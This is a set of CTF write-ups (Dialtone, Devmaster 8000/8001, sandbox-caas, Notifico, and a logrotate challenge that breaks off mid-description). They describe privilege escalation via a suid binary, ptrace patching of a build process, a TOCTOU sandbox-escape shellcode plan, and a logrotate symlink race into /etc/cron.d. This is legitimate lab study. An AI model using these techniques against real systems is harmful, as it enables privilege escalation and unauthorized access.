Dialtone challenge

“You might need a pitch-perfect voice to solve this one. Once you crack the code, the flag is CTF{code}.”

Initial thoughts

Unlike other challenges we probably need to find a ‘code’ which will be part of the flag.
Dialtone sounds like something related to telecommunications, and the description probably verifies it.

Overview

We are given an attachment called “a.out” which is a X86_64 ELF binary.
Taking a brief look at the ELF we notice that in addition to imports from standard libraries we also see imports from libpulse.so and libpulse-simple.so which are libraries of a sound server software called PulseAudio.

Functions

main()

pa_conn = pa_simple_new(0, *argv, 2, 0, "record", &g_pa_struc,0, 0, &error);
if (!pa_conn) {
    fprintf(stderr, "pa_simple_new() failed: %s\n", pa_strerror(error));
    return 1;
}
struc.field_0 = 0;
struc.field_4 = 0;
struc.field_8 = 0;
do {
    if (pa_simple_read(pa_conn, buff, 0x8000, &error) < 0) {
        fprintf(stderr, "pa_simple_read() failed: %s\n", pa_strerror(error));
        return 1;
    }
    x(buff, &derived_buff);
    r_result = r(&struc, derived_buff);
    if (r_result < 0) {
        fwrite("FAILED\n", 1, 7, stderr);
        return 1;
    }
} while (r_result);
fwrite("SUCCESS\n", 1, 8, stderr);
pa_simple_free(pa_conn, 1);
return 0;

The plan

We probably want “SUCCESS” to be printed instead of “FAILED”.

Thus we want to make r() return 0 at some point, and avoid negative return values.

Find sinks of our data input to see what’s going on.

x()

bit_flip(buff, derived_buff);
for (i = 1; i < 14; i++) {
    tmp = 1 << i;
    for (j = 0; j < 0x2000; j += tmp) {
        y(derived_buff, j, tmp);
    }
}

This function and the functions down this path seem to not modify the previously read 0x8000 bytes.

Instead it reads our input to produce some other data into derived_buff which is later passed on to r().

After verifying that input is only read to write something out we decided to skip over most of the code down this path thinking it may be interesting later when we want to know more about how derived_buff is created.

r()

int __fastcall f(struct_0* p_struc, void* derived_buff) {
  ++p_struc->field_0;
  if (p_struc->field_0 > 20) {
      return -1;
  }

  arr_1[0] = f(derived_buff, 1209);
  arr_1[1] = f(derived_buff, 1336);
  arr_1[2] = f(derived_buff, 1477);
  arr_1[3] = f(derived_buff, 1633);
  chosen_arr_1_idx = -1;
  tmp_arr_1_val = 1.0;
  for (i = 0; i < 4; i++) {
      if (arr_1[i] > tmp_arr_1_val) {
          chosen_arr_1_idx = i;
          tmp_arr_1_val = arr_1[i];
      }
  }

  arr_2[0] = f(derived_buff, 697);
  arr_2[1] = f(derived_buff, 770);
  arr_2[2] = f(derived_buff, 852);
  arr_2[3] = f(derived_buff, 941);
  chosen_arr_2_idx = -1;
  tmp_arr_2_val = 1.0;
  for (j = 0; j < 4; j++) {
      if (arr_2[j] > tmp_arr_2_val) {
          chosen_arr_2_idx = j;
          tmp_arr_2_val = arr_2[j];
      }
  }

  if (p_struc->field_8) {
      if (chosen_arr_1_idx < 0 && chosen_arr_2_idx < 0) {
          p_struc->field_8 = 0;
          p_struc->field_0 = 0;
      }
      return 1;
  }
  if (chosen_arr_1_idx >= 0 && chosen_arr_2_idx >= 0) {
      y = chosen_arr_1_idx | 4 * chosen_arr_2_idx;
      found_match = 0;
      switch (p_struc->field_4) {
          case 0:
              found_match = y == 9;
          break;
          case 1:
              found_match = y == 5;
          break;
          case 2:
              found_match = y == 10;
          break;
          case 3:
              found_match = y == 6;
          break;
          case 4:
              found_match = y == 9;
          break;
          case 5:
              found_match = y == 8;
          break;
          case 6:
              found_match = y == 1;
          break;
          case 7:
              found_match = y == 13;
          break;
          case 8:
              if (y == 0) {
                  return 0;
              }
          break;
      }
      if (found_match != 1) {
          return -1;
      }
      ++p_struc->field_4;
      p_struc->field_0 = 0;
      p_struc->field_8 = 1;
  }
  return 1;
}
Arguments

p_struc is a reference to a zero’d structure of 3 dwords.

derived_buff is a reference to the derived data written by x() called by main().

Flow

It starts with an increment and a check on the incremented field, so we may treat p_struc->field_0 as some kind of counter.

We notice 2 symmetrical pieces of code which call f() and then loop on the results.

Each loop sets its chosen index variable (chosen_arr_1_idx and chosen_arr_2_idx) to max(array) if there exists a value greater than 1.0 in array.

We now reach the first condition for making main() continue looping.

It looks like when p_struc->field_8 != 0 the function would always return 1.

When chosen_arr_1_idx and chosen_arr_2_idx are negative p_struc->field_8 and p_struc->field_0 are set back to 0.

p_struc->field_0 = 0 is a good sign because it makes returning a negative value less likely.

It could be said that p_struc->field_8 is some sort of state flag which needs to keep changing for r() to do something else.

In a subsequent call to r() when p_struc->field_8 is zero we can see that if any of chosen_arr_1_idx or chosen_arr_2_idx are negative then r() would return 1.

This probably means that for some interesting thing to happen in r() we want (chosen_arr_1_idx >= 0 && chosen_arr_2_idx >= 0) || (chosen_arr_1_idx < 0 && chosen_arr_2_idx < 0).

y = chosen_arr_1_idx | 4 * chosen_arr_2_idx is a 4×4 array index calculation which is compared to constant values inside the switch bracket.

If found_match != 1 then a negative value is returned, so we always want found_match == 1.

p_struc->field_4 is incremented which would make us compare other values with y in subsequent calls to r().

p_struc->field_0 = 0 makes us less likely to return -1.

p_struc->field_8 = 1 would lead us into the possibility of returning it to zero if chosen_arr_1_idx < 0 && chosen_arr_2_idx < 0.

After going over the code it is now clear what is the flow:

  • if flag == 0
    • if chosen_arr_1_idx >= 0 and chosen_arr_2_idx >= 0
      • if i == 8 and y == 0
        • SUCCESS
      • if y == constant_nums[i]
        • flag = 1
        • i++
  • else
    • if chosen_arr_1_idx < 0 and chosen_arr_2_idx < 0
      • flag = 0

We want each call to r() to be followed by another call to r() in a way that keeps comparing y untill we reach p_struc->field_4 == 8 where y == 0.

Our input

At this point we wanted to understand how we can create derived_buff such that it would follow our planned flow untill SUCCESS.

But something caught our attention inside f().

double __fastcall f(_complex *modified_buff, int const_val)
{
  return cabs(modified_buff[(const_val << 13) / 44100]);
}

The division by 44100 looked too pretty, so we searched for it on google and the first result was “44,1000 Hz – Wikipedia” which wasn’t unexpected because of the audio context.

This still wasn’t enough to really help us, but we felt lucky so we decided to google search all constant values we could find in the binary.

We found out that the constant values passed to f() calls were all related to DTMF code.

DTMF diagrams from google images also felt like the state machine of r().

We also found images of DTMF pads which are 4×4.

So we started to write down values from the DTMF pad with chosen_arr_1_idx and chosen_arr_2_idx being our indices in the order of the calculated y value comparsion.

chosen_arr_1_idx | 4 * chosen_arr_2_idx
  • 1 | 4 * 2 == 9
  • 1 | 4 * 1 == 5
  • 2 | 4 * 2 == 10
  • 2 | 4 * 1 == 6
  • 1 | 4 * 2 == 9
  • 0 | 4 * 2 == 8
  • 1 | 4 * 0 == 1
  • 1 | 4 * 3 == 13
  • 0 | 4 * 0 == 0
1209 Hz1336 Hz1477 Hz1633 Hz
697 Hz123A
770 Hz456B
852 Hz789C
941 Hz*0#D

We got the sequence 859687201 which turned out to be part of the flag as stated in the challenge description: CTF{859687201}

Devmaster 8000 and devmaster 8001

Setup

This is a docker container that runs a “job server”, that can be reached over the Internet.

A job description contains:

  1. Set of input files that are sent to the server, and saved in a sandboxed directory
  2. The command to run in the sandbox (for example: gcc ./inputfile.c -o binary)
  3. Set of output files to download from the server after the job has run

The interesting part of the direcory structure of the docker image is:

/etc/                             
/home/                            
/home/user/
          challenge.sh      Startup script that runs the job server  
          server            The job server that accepts and runs jobs  
          admin             An admin server, requires a password to access  
          admin.cc          The source code of the admin server  
          target_loop       Rebuilds the admin server every 30 seconds from admin.cc  
          drop_privs        Drops privileiges and executes as requested uid:gid  
          flag              Owned by admin, readonly

/home/user/builds/build-workdir-XXXXX    A unique directory per job

The (interesting) users in /etc/password
root
admin
sanbox-runner-0
sanbox-runner-1
.
.
sandox-runner-7

Interesting: The admin server is built every 30 seconds from admin.cc via the job server as a regular job.

Observations

The sandbox includes:

  1. The uid:gid are set to sandox-runner-X, and no 2 jobs are run simultaniously with the same user. I.E., if sandbox-runner-0 is running, then the new job will be assigned to the next user id, sandbox-runner-1
  2. The job process enters the following namespaces: mount, ipc.
  3. All filesystems are mounted r/o except :
    1. /home/user/builds/build-workdir-XXXXXX of that job is mounted r/w
    2. /proc mounted r/w
    3. /tmp mounted r/w
  4. Notably:
    1. The sandboxing code was copied from the Bazel project, but CLONE_PID and CLONE_USER were removed.
    2. ptrace is ensured to be available, in the challenge.sh startup script
    3. /home/user/drop_privs is owned by root and suid (!)

Devmaster 8000

The challenge is solved by submitting a job that runs

/home/user/drop_privs admin admin cat /home/user/flag

This works since drop_privs is owned by root and suid and sgid.

DevMaster 8001

drop_privs is marked non-executable for non-root users, which precludes the previous solution.

The solution may be an overkill 😉

Our goal was to run an executable that has the same uid and gid as the admin-build job.

Attempt #1

Trying to double fork() and reparent ourselves to the init process, thus, the job server would think we were done running, while we are still running.

The job server set prctl(PR_SET_SUBREAPER,1) on the job’s parent and we were unable to reparent ourselves to init.

Attempt #2

Main idea: Copy a suid file as sandbox-runner-1 to /tmp/patcher and then run it from sandbox-runner-0, thus obtaining the uid:gid of sandbox-runner-1 while the job server thinks we running as sandbox-runner-0.

Note that the admin build job runs

bash -c “sleep 1; g++ –std=C++11 admin.cc -o admin; sleep 1”

and since the job server thinks we are running as sanbox-runner-0, the admin build will run as sandobx-runner-1.

As sandbox-runner-1:

  1. Copy a modified admin.cc to → /tmp/.cc – see step 5 to understand the odd filename
  2. Wait for admin build to happen (monitor this with ps)
  3. ptrace attach to the bash process
  4. find bash’s heap (grep heap /proc/pid/maps)
  5. Search for the string “admin.cc” in bash’s heap and replace it with “/tmp/.cc” (same number of chars)
  6. ptrace detach from the bash process

The result will be that bash will compile our own admin server that will output the flag file without any checks.


Below is the timeline of the attack:

Situation at Time: T

  • user sandbox-runner-0 > job bash -c sleep(10)

Situation at Time: T + 5 seconds

  • user sandbox-runner-0 > job bash -c sleep(10)
  • user sandbox-runner-1 > job bash -c cp new-admin.cc /tmp/.cc; cp ./patcher /tmp/patcher; chmod ug+s /tmp/patcher

Situation at Time: T + 10 seconds

  • user sandbox-runner-0 > job /tmp/patcher

note: /tmp/patcher will actually run as sandbox-runner-1 due to the suid permission)

Situation at Time: T + 10 seconds + sometime (<30)

  • user sandbox-runner-0 > job /tmp/patcher
  • user sandbox-runner-1 > job build admin server (run by the system) – will compile /tmp/.cc instead of admin.cc

Situation at Time: T + 40 seconds

  • connect as new-and-improved admin and get the flag

sandbox-caas

Setup

The server receives a 0x800 shellcode from the user, and runs it in a forked process.

The process configurations is as follows:

  • All namespaces are NEW namespaces
  • chroot into ./tmp/.challenge
  • rlimit of one second of CPU time with no core files
  • The process sent a kill signal after 2 seconds
  • uid and gid are mapped to the original (unknown) uid and gid of the server
  • Process only contains our shellcode (R/O) and a small stack (R/W)
  • The process is being ptrace()d
  • SECCOMP that only allows:
    • read
    • write
    • close
    • munmap
    • sched_yield
    • dup
    • dup2
    • nanosleep
    • connect
    • recvmsg
    • bind
    • exit
    • exit_group
    • clone (CLONE_THREAD | CLONE_VM | CLONE_SIGHAND, ...)
    • socket (AF_INET, AF_DGRAM, 0)
    • mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0)
  • Process has the following open file descriptors:
    • fd 0 -> The original socket that was used to send the shellcode to the server
    • fd 1 -> ditto
    • fd 2 -> ditto
    • fd 100 -> UNIX socket. The other end is connected to a “connect-server” see below

The connect-server runs outside of the sandbox, and accepts 2 kinds of messages:

  1. GetEnvData(N) – Sends back a one of the following numbers 1,3,3,7
  2. Connect(AddressOfIP, port) – connects to IP and Port, and sends the connected socket, back to the sandboxed process
    • The only allowed IP and port are 127.0.0.1:8080

Two additional servers exist:

  1. Metadata server on 127.0.0.1:8080
    • Accepts a connections
    • Sends “Not implementeded”
    • Closes the connection
  2. Flag server on 127.0.0.1:6666
    • Accepts a connection
    • Sends the contents of the flag file

Observations

The Connect() function is the interesting function and contains 2 potential bugs:

  1. There seems to be a TOCTOU bug between the VERIFY stage and the CONNECT stage.
  2. If the connect() fails, the socket is still passed to our sandboxed process.

Main idea

The namespace of a socket is determined at the time of creation of the socket. Thus, if we receive a socket from the outside that has not been connect()ed, we can use it to connect to 127.0.0.1:6666 from within the sandbox.

Looking in to the TOCTOU issue:

The processing of the Connect() message is done as follows:

  1. Obtain port and address of IP from our message
  2. ip = SafeRead(sandboxPid, AddressOfIP)
  3. Fail if ip:port != 127.0.0.1:8080
  4. ip = SafeRead(sandboxPid, AddressOfIP)
  5. fd = connect(ip:port)
  6. SendFDToSandbox(fd)

The SafeRead(sandboxPid, AddressOfIP) function does as follows:

  1. Try 3 times until success or return error:
    1. Verify the sandboxPid is in read() or recvmsg() syscall
    2. Sleep(100 microseconds) <– Note: Always happens at least once!
  2. Check that GetNumberOfThreads(sandboxPid) in sandboxed process <= 1
  3. return process_vm_readv(sandboxPid, addressOfIP)

It seems that our process must be blocked on read() or recvmsg() and no other threads may be running.

After (many) failed attempts to pass the above checks, we realized that the GetNumberOfThreads() function had a bug in it, that caused it to always return -1 threads.

The bug was that GetNumberOfThreads() was reading the /proc/sandboxPid/status file, and using ftell() to determine the size of the file.

However, ftell() returns 0 for /proc/ files, thus GetNumberOfThreads() was not finding the string “Threads: ” in the empty buffer that was read from the file, and in-turn returned -1 as the number of threads.

Solving

Shellcode did the following:

  1. sys_clone(thread_t)
  2. sys_write(fd=100, “Connect(stack address containing 127.0.0.1, 8080)”, …)
  3. socket_fd = sys_recvmsg()
  4. sys_connect(socket_fd, “127.0.0.1”, 6666)
  5. sys_read(socket_fd, &flag)
  6. sys_write(1, &flag)

thread_t:

  1. sys_nanosleep(X microseconds) X ~= 600,000 (Actually this value worked first time)
  2. modify stack address IP address to a non-routable IP, we used 127.127.255.255
  3. sys_exit()

The flag was: CTF{W3irD_qu1rKs}

A few afterthoughts

We had to select an IP that will make connect() fail immediately, otherwise, connect() takes too long to timeout. Therefore, a non-routable address was chosen.

Wondering if the GetNumberOfThreads() bug was the only way to pass this riddle. The secomp filter included the option to create a UDP/IP socket, however, there is no interface to bind to. Binding to 0.0.0.0 succeeds, but subsequent read()s fail, due to the fact that there are no interfaces.

Notifico

This is a writeup for how we solved the notifico 35c3 CTF challenge.

The task:

We are presented with a tar file which contains another tar file, an executable named check, and the python script check.py.
The tar file contains 225 folders, each of which contains one regular file and between 42 and 56 links to similar files in other folders.

The script check.py (python3) runs the check executable on the folder, checks that its result is 15, concatenates “magic” from the alphabetically ordered regular file’s modes (file_mode & 00777), takes the sha256 of the magic as a key and decrypts the encrypted flag with the digest. If the result contains the standard flag prefix (35C3) and the flag is made of alphanumeric characters it prints the flag.

The check executable performs 4 actions:
• runs on the folders, and creates inotify watch with mask 9 (IN_ACCESS | IN_CLOSE_WRITE) on all the regular files. Note that IN_ACCESS means that “File was accessed (e.g., read(2), execve(2)).”. During creating watchers it checks the mode of each regular file. If its write permission ^ execute permission for the owner is not 0 or if it has any of rwx permissions for other users the executable returns 255.
• Opens and closes all the regular files (which should cause IN_CLOSE_WRITE notification)
• Tries to execute all the symbolic links (which should cause IN_ACCESS notification if the file is executable)
• Reads and analyses the inotify watch results. If something was executed, it returns 255, otherwise it returns the number of close notifications received.

Initial analysis:

If we want to have something decrypted, we should find such a set of 15 folders, and links in which are not pointing to files in this set, set on files inside these folders +wx permission, and run check.py in order to check results.
In this stage it is still unclear how many combinations of this kind exist. The order in the combination doesn’t matter.
It seems like we should check results of all these sets for decryptability.

As per hint (we’ll not need it), the graph received here resembles the problem of enumeration of 15 Queens on 15×15 chess board, where the folders are places on the board [a-f][1-15].
I wasn’t able to map all the folders to exact places on the board (only the center one and main diagonals), but we don’t really need it.

We’ll bruteforce it.

The bruteforce:

During any bruteforce we usually have 3 main problems:
• performance
• performance
• and once again performance.

As far as I remember what I read somewhere, the number of unique solutions for this problem on N sized board has its own sequence name (A000170, Number of ways of placing n nonattacking queens on an n X n board
(Formerly M1958 N0775)) and can be found here: https://oeis.org/A000170
For the board 15×15 it is 365596, which is not too much, the problem is finding these solutions in reasonable time and avoiding duplicates.
I have a good workstation at home, and I can afford parallel bruteforcing, so let’s do it.

1 – Let’s construct some kind of representation of the graph.

Inside the chall folder let’s run the following shell commands:

# unpack the folder
tar -xf *.tar.gz			 
cd chall
# get list of folders into folders.txt
ls -l | cut -d" " -f 9 > ../folders.txt
cd ..
# create a listing of the folder in corresponding .fld file
for i in `cat folders.txt`; do ls -l ./chall/$i > $i.fld ; done

Now we have all the links.

2 – Let’s get the alphabetically ordered folders exactly as they are in the script

We just remove from the check script execution of the check executable, and add a print of the file name in the loop that creates the “magic”.

Here is what we got after some small editor massaging:

ind2fold = {
	0 : "APFLtDMGfSvLChWH",
	1 : "ASzhPMFMNmpBMEOm",
	2 : "AYenxPNbHIIxFaBs",
	3 : "AkpRSKtliwhtjBLO",
	4 : "AlUQWFAVMYyANtGl",
	5 : "BpFkWrUBXvwAVywH",
	6 : "BsPQryqrPSPUniAt",

	...
	...
	...

	218 : "zIzNJPYLPMyBuaWj",
	219 : "zNkvKHFVpILKhGee",
	220 : "zQiyomzHVpITGMFx",
	221 : "zUfpdFqENVnMqMbh",
	222 : "zWvRJALKMjTnoaxf",
	223 : "zoPhogrElBntiQUN",
	224 : "zsEGaUEJXslKOiZP",
}

fold2ind = {}

for i in ind2fold:
	fold2ind[ind2fold[i]] = i

3 – Let’s read the folder structure for building some graph representation:

Let’s read all the “.fld” files created earlier and analyze them as follows:

xrefto = {}
xreffrom = {}

folders_found = []
folders_dict = {}

# we get all the fld files via command line

for n in sys.argv[1:]:
	f = open(n, "r")
	res = []
	current_folder = n.replace(".fld", "")
	folders_found.append(current_folder)
	folders_dict[current_folder] = True
	for l in f:
		if l.find("-> ../") != -1: #analyzing a link
			splitted = l.split()
			res.append( splitted[-1].split('/')[1]) # getting a folder to which it points
	xrefto[current_folder] = sorted(res)
	# creating an opposite direction
	for r in sorted(res):
		if not r in xreffrom:
			xreffrom[r] = [current_folder]
		else:
			xreffrom[r].append(current_folder)
	f.close()

In this piece of code we have 2 dictionaries that represent where exactly the links point to (xrefto) and are pointed from (xreffrom).

4 – Let’s add some multiprocessing and start to avoid duplicates:

Since the order inside the combination doesn’t matter, we can conclude the following:
• We should define some order inside the combination. Alphabetical order is OK, we’ll call all combinations ordered in another way unordered which we’ll skip.
• This gives us a possibility to multi-process: during the brute-force we can start from different folders (i.e. cells of the board) and exclude what we don’t need.

This gives us the following bruteforce run:

import multiprocess
...
...
...

processes = []

folders_found = sorted(folders_found)

for i in range(len(folders_found) - 15):
	res_stack = []
	processes.append(multiprocessing.Process(target = bruteforce, args = (folders_dict.copy(), xreffrom, xrefto, 0, res_stack[:], True)))
	folders_dict.pop(folders_found[i], None) 
# note that we running on the different set each time, and removing 1 starting folder 

# per bruteforcing instance
for p in processes:
	p.start()

5 – Let’s write bruteforcing itself

# sorry, the code is ugly

def bruteforce(current_set, # places on the board left
	xrf, # xrefs from and to the places of the board collected earlier
	xrt,
	level, # current recursion level
	variant, # current variant 
	only_first): # dirty hack: see the usage

	variant = variant[:]
	current_set = current_set.copy() # copy the current set, we'll have to change it
	if level == 15:
		check(sorted(variant)) 
		# if we arrived to recursion level 15 then we have a variant, let's check it
		return False

	for f in sorted(current_set.keys()):
		# iterating the current set of places left unbeaten in alphabetical order
		new_set = current_set.copy()
		new_set.pop(f, None) # exclude current cell from the set

		# exclude fields beaten by the current cell 
		for x in xrt[f]:
			new_set.pop(x, None)

		# exclude fields that doesn't fit to alphabetical sequence

		test_set = new_set.copy()
		for t in test_set:
			if t < f:
				new_set.pop(t, None)

		if (len(new_set.keys()) + level) < 15:
			# get out if there is no enough places
			return False

		variant.append(f)
		# go down with the recursion
		bruteforce(new_set, xrf, xrt, level + 1, variant, False)
		variant.remove(f)
		if only_first:
			# on the first level we want to check only one variant
			# all others will be checked in other instances
			print("Bruteforce started from", f, " finished")
			return False
	return False

6 – Let’s copy out the checking from the check.py and fix it

#!/usr/bin/env python3
from sys import argv
import re
from hashlib import sha256
from Crypto.Cipher import AES

def check (variant):
	res = ""
	enc_flag = b'\x99|8\x80oh\xf57\xd4\x81\xa5\x12\x92\xde\xf5y\xbc\xc0y\rG\xa8#l\xb6\xa1/\xfeE\xc5\x7f\x85\x9a\x82\x0b\x02Y{\xd9/\x92X>p\\\xb7H\xb1{\xcf\x8b/r=\x87-#\xae\x95\xb6\xd1\r\x03\x13'
	flag_fmt = r"35C3_[\w]*"

	global ind2fold
	global fold2ind
	cnt = 0
	# creating the magic
	for i in range(len(ind2fold.keys())):
		if ind2fold[i] in variant:
			cnt += 1
			res += "700"
		else:
			res += "400"

	# checking for obvious mistakes,
	# we should have 15 queens and 225 cells at all

	if cnt != 15 or len(res) != 225*3:
		print ("Error!Error!Error!Error!Error!Error!Error!Error!Error!Error!Error!")
		exit(1)

	magic = res
	try:
		flag = AES.new(sha256(magic.encode()).digest(), AES.MODE_ECB).decrypt(enc_flag)
		if flag.decode().find("35C3_") != -1:
			hexdump.hexdump(flag)
		if re.fullmatch(flag_fmt, flag.decode()) is not None:
			print("Looks good, here is your output: {}".format(flag))
			# exit(0)
			# we remove the original exit because we want to know how 
# much time the full bruteforce takes
	except Exception:
		pass

	return res

7 – Let’s run it.

Actually running it with python3 may be a bit slower then we need. Let’s run it with pypy3:

pypy3.5-6.0.0-linux_x86_64-portable/bin/pypy3 multi_dict.py *.fld

It yields the flag b’35C3_congr4ts_th0se_were_s0m3_truly_w3ll_pl4c3d_perm1ssions_Sir_’

It takes some hours on my home workstation, but if we did everything right, it should fit.

Timing of the bruteforce

In order to get the flag I left this executing before going to sleep.
However I was curious about how much time exactly should it take, so I added some prints and run it again.
It appears that getting a flag takes about an hour, and full bruteforce takes about 2 hours on my computer (Ubuntu 18.0.1, i7 CoffeLake, 64G RAM)

See the output of the script below:

╰─$ ../pypy3/pypy3.5-6.0.0-linux_x86_64-portable/bin/pypy3 ./multi_dict.py *.fld
Starting
2018-12-31 21:19:26.262807
Length is 225
Bruteforce started from mEXeTszvrPQxLSIM finished
.
< - cut - >
.
Bruteforce started from FacVEEUFvQtVfjcj finished
Bruteforce started from ISOYfrwvVOMZveHE finished
Ending
2018-12-31 22:21:36.675702
400400400400400400400400400400700400400400400400400400400400400400400400400400400400700400400400400400400700400400400400400400400400400400700700400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400700400700400400400400400400400400400400400400400400400400400400400400400700400400400700400400400400400400400400400400400400400400400400700400400700400400400400700400400400400400400400400700400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400400700400700400400400400400400
00000000: 33 35 43 33 5F 63 6F 6E 67 72 34 74 73 5F 74 68 35C3_congr4ts_th
00000010: 30 73 65 5F 77 65 72 65 5F 73 30 6D 33 5F 74 72 0se_were_s0m3_tr
00000020: 75 6C 79 5F 77 33 6C 6C 5F 70 6C 34 63 33 64 5F uly_w3ll_pl4c3d_
00000030: 70 65 72 6D 31 73 73 69 6F 6E 73 5F 53 69 72 5F perm1ssions_Sir_
Looks good, here is your output: b'35C3_congr4ts_th0se_were_s0m3_truly_w3ll_pl4c3d_perm1ssions_Sir_'
Bruteforce started from FsiBPvyjOwaioLBP finished
Bruteforce started from ExCZSjfztnUcXCqh finished
Bruteforce started from GmSNArrbwMYaJsND finished
Bruteforce started from FLsGyEZReOEFwvqm finished
Bruteforce started from EQsvyIRczZVqeYkD finished
Bruteforce started from DvixmyIxrLeiXeZv finished
Bruteforce started from DqOgFKUtvPDxcDhA finished
Bruteforce started from FbLGtlhVWXDzMEEv finished
Bruteforce started from CIMHMvnbzSHPSZzw finished
Bruteforce started from DTGRkOyLvIRXOcFA finished
Bruteforce started from DvEdLxkYtbjDeMmI finished
Bruteforce started from DQiHxMFfQxEjRzak finished
Bruteforce started from BuuhlRIKIUKQixNn finished
Bruteforce started from DBdOhoYdrCrzteVm finished
Bruteforce started from AlUQWFAVMYyANtGl finished
Bruteforce started from DRlKwGefVbUJbweg finished
Bruteforce started from BsPQryqrPSPUniAt finished
Bruteforce started from BxztQECAmlZiVgLd finished
Bruteforce started from AkpRSKtliwhtjBLO finished
Bruteforce started from BpFkWrUBXvwAVywH finished
Bruteforce started from ASzhPMFMNmpBMEOm finished
Bruteforce started from AYenxPNbHIIxFaBs finished
Bruteforce started from APFLtDMGfSvLChWH finished
╭─[cenzored]@[cenzored] ~/ctfs/notifico
╰─$ date
Mon Dec 31 23:01:46 IST 2018

Logrotate / ZajeBiste / 500 points

The challenge (as stated in the 35C3 website)

“Logrotate is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large. It also gives you a root shell.

For your convenience, I added a suid binary to run cron jobs. Enjoy. Files at:

https://35c3ctf.ccc.ac/uploads/logrotate-6c103367e3c15cb6873403e16b38f540.tar And get your shell here: nc 35.242.226.147 1”

Environment overview

The nc seems to enter an nsjail docker instance running an unprivileged shell.
nc 35.242.226.147 1
+ echo ‘Setting up chroot.’
Setting up chroot.
+ cp -R –preserve=mode /skel /tmp/
+ mount -o bind /proc /tmp/skel/proc
+ touch /tmp/skel/dev/null
+ touch /tmp/skel/dev/zero
+ touch /tmp/skel/dev/random
+ touch /tmp/skel/dev/urandom
+ mount -o bind /dev/null /tmp/skel/dev/null
+ mount -o bind /dev/zero /tmp/skel/dev/zero
+ mount -o bind /dev/random /tmp/skel/dev/random
+ mount -o bind /dev/urandom /tmp/skel/dev/urandom
+ cp -R –preserve=mode /home/user /tmp/skel/home/
+ chmod u+s /tmp/skel/home/user/run_cron
+ cp –preserve=mode /tmp/skel/etc/cron.daily/logrotate /tmp/skel/etc/cron.d/
+ cp –preserve=mode /home/user/pwnme /tmp/skel/etc/logrotate.d/
+ cp /flag /tmp/skel/
+ chmod 400 /tmp/skel/flag
+ echo ‘Setup done.’
Setup done.
+ exec /usr/sbin/chroot /tmp/skel /home/user/unpriv

uname -a
Linux NSJAIL 4.14.65+ #1 SMP Thu Oct 25 10:42:50 PDT 2018 x86_64 GNU/Linux

id
uid=1000(user) gid=1000(user) groups=1000(user),0(root)

The interesting parts of the file system

/
/flag				← The flag file permissions 400 (readable only by root)
/bin
/proc
/usr
 	/sbin
		logrotate		← The latest logrotate executable ver 3.11.0
/etc
 	 	logrotate.conf		← logrotate main config file, includes /etc/logrotate.d/*
	/cron.d
           logrotate	← Runs logrotate with main config file
	/logrotate.d/
		pwnme		← logrotate log definition

/home
	/user
		chroot.sh		← The docker startup script, seen above in the nc output
		run_cron		← Runs all the files found in /etc/cron.d/ as root(!)

	
/tmp/				← Empty tmpfs


Please note that all the above files and directories, barring the /flag file, are
owned by root and and have read and execute permissions to all.

Looking at the pwnme logrotate config file, we see:

cat /etc/logrotate.d/pwnme
/tmp/log/pwnme.log {
	daily
	rotate 12
	missing ok
	notifempty
	size 1K
}


This concludes the environment overview.

Privilege Escalation
Basic idea
For P.E., purposes we should take note that two things are out of the ordinary 

  • We can invoke logrotate as root (using the /home/user/run_cron.sh)
  • We control the entire path of the log file /tmp/log/pwnme.log 

Inspecting man logrotate we expect the following to happen when the logrotate is invoked

  • Delete    /tmp/log/pwnme.log.12
  • Rename /tmp/log/pwnme.log.11 to /tmp/log/pwnme.log.12
  • Rename /tmp/log/pwnme.log.10 to /tmp/log/pwnme.log.11
  • . .
  • . .
  • Rename /tmp/log/pwnme.log.1 to /tmp/log/pwnme.log.2
  • Rename /tmp/log/pwnme.log      to /tmp/log/pwnme.log.1
  • Touch    /tmp/log/pwnme.log   with ownership of user:user

The basic idea, that comes to mind, is to introduce a race between step 7 and step 8, i.e.,
7. Rename /tmp/log/pwnme.log to /tmp/log/pwnme.log.1

→  Replace /tmp/log with a symbolic link to /etc/cron.d

8.Touch   /tmp/log/pwnme.log     with ownership of user:user

Hence, Step 8, will create an empty file owned by user:user inside /etc/cron.d instead of /tmp/log.

 The replacement of /tmp/log with a symbolic link can simply be done by the equivalent of

mv /tmp/log /tmp/dummy && ln -s /etc/cron.d/ /tmp/log

 Issues and Solutions

 Issue 1

Logrotate runs the stat() function against /tmp/log/pwnme.log at some point.

This test fails, due to the the “protected_symlinks”, security feature (/proc/sys/fs/protected_symlinks to 1). The feature prevents the root user from following symbolic links of sticky files and directories with stat(), and, of course, /tmp is sticky.

Solution

The same time of check / time of use issue exists here as well.

Since the security feature only affects stat(), and not open(). The symbolic link should be created after the stat() has succeeded.

Issue 2
While we were able to win the race on our local machine, it was not easy to win the race on the remote machine, where the number of attempts was significantly smaller, and the timing was different.

We searched for ways to increase the chances of winning the race.

Solution
We went over the logrotate code and realized that what was actually happening was:

  • Rename /tmp/log/pwnme.log.12 to /tmp/log/pwnme.log.13    ← 13 (!)
  • Rename /tmp/log/pwnme.log.11 to /tmp/log/pwnme.log.12
  • ..
  • ..
  • Rename /tmp/log/pwnme.log.1  to /tmp/log/pwnme.log.2
  • Rename /tmp/log/pwnme.log     to /tmp/log/pwnme.log.1
  • if /tmp/log/pwnme.log exist?  ← Note: it was renamed in the previous step
    • Write to STDOUT “Renaming file .. “
    • Rename /tmp/log/pwnme.log to /tmp/log/pwnme.log.backup.HH.MM.DD
    • If rename failed exit()
  • Touch    /tmp/log/pwnme.log     with ownership of user:user
  • Unlink   /tmp/log/pwnme.log.13

Note: The above pseudo code is a simplified version of the actual code. The actual code is a bit more involved.

The replacement of /tmp/log to the symbolic link that points to /etc/cron.d should happen just before step 7.

The “write to STDOUT” in step 7.1 is the closest printout to the race that we could find.

We created an executable that ran ‘run_cron.sh’ but replaced it’s STDOUT with a pipe that had a full write-end, which means that any additional writes to the pipe, by the process (such as ‘write to STDOUT’ in step 7.1) would block.

The above executable created the /tmp/log/pwnme.log in a tight loop, trying to get in between of 6 and 7.

Once the root-logrotate process was blocked, our executable did the following:

  • Read from the pipe, to release the root-logrotate process, that was stuck in step 7.1
  • Tight loop of X cycles, so that step 7.2 finishes, but before step 8
